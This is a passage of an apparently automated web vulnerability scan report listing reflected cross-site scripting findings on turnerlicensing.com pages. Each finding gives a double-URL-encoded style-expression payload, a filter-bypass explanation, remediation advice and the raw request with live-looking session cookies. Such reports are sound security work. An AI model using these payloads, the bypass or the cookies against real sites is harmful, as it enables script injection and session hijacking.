Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.125. http://www.turnerlicensing.com/teams_by_state/Utah [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Utah
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d76ae%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279da4365e664 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d76ae'style='x:expression(alert(1))'9da4365e664 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Utah?d76ae%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279da4365e664=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.126. http://www.turnerlicensing.com/teams_by_state/Vancouver [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Vancouver
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d512d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270ec04acb8d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d512d'style='x:expression(alert(1))'0ec04acb8d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Vancouver?d512d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270ec04acb8d9=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.127. http://www.turnerlicensing.com/teams_by_state/Vermont [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Vermont
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 72a41%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252734af1748ca7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 72a41'style='x:expression(alert(1))'34af1748ca7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Vermont?72a41%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252734af1748ca7=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.128. http://www.turnerlicensing.com/teams_by_state/Virginia [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Virginia
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6b052%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f30387b07b1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6b052'style='x:expression(alert(1))'f30387b07b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Virginia?6b052%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f30387b07b1=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.129. http://www.turnerlicensing.com/teams_by_state/Washington [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Washington
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6fa0b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271b3031fc933 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6fa0b'style='x:expression(alert(1))'1b3031fc933 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Washington?6fa0b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271b3031fc933=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.130. http://www.turnerlicensing.com/teams_by_state/Washington-D-C [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Washington-D-C
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9be7f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e43a7f2732a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9be7f'style='x:expression(alert(1))'e43a7f2732a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Washington-D-C?9be7f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e43a7f2732a=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.131. http://www.turnerlicensing.com/teams_by_state/West-Virginia [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/West-Virginia
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e3347%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25276cb889a7789 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e3347'style='x:expression(alert(1))'6cb889a7789 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/West-Virginia?e3347%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25276cb889a7789=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.132. http://www.turnerlicensing.com/teams_by_state/Wisconsin [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Wisconsin
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9a45e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527841fffba0cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9a45e'style='x:expression(alert(1))'841fffba0cf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Wisconsin?9a45e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527841fffba0cf=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.133. http://www.turnerlicensing.com/teams_by_state/Wyoming [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Wyoming
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 17380%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252710b3c762605 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 17380'style='x:expression(alert(1))'10b3c762605 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Wyoming?17380%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252710b3c762605=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.134. http://www.turnerlicensing.com/turner [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5edf2%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d6b4ca84651 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5edf2'style='x:expression(alert(1))'d6b4ca84651 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner?5edf2%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d6b4ca84651=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.135. http://www.turnerlicensing.com/turner_about_us [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_about_us
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 12db7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527560f4d45a75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 12db7'style='x:expression(alert(1))'560f4d45a75 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_about_us?12db7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527560f4d45a75=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.136. http://www.turnerlicensing.com/turner_boxed_note_cards [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_boxed_note_cards
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 372c9%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527137ac6a221e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 372c9'style='x:expression(alert(1))'137ac6a221e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_boxed_note_cards?372c9%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527137ac6a221e=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.137. http://www.turnerlicensing.com/turner_christmas_cards [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_christmas_cards
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8303b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527fa4a56a0150 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8303b'style='x:expression(alert(1))'fa4a56a0150 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_christmas_cards?8303b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527fa4a56a0150=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.138. http://www.turnerlicensing.com/turner_deluxe_journals [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_deluxe_journals
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ba999%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d367c03018a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ba999'style='x:expression(alert(1))'d367c03018a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_deluxe_journals?ba999%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d367c03018a=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.139. http://www.turnerlicensing.com/turner_frequently_asked_questions [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_frequently_asked_questions
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7e4b5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527c1c6aa6bced was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7e4b5'style='x:expression(alert(1))'c1c6aa6bced in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
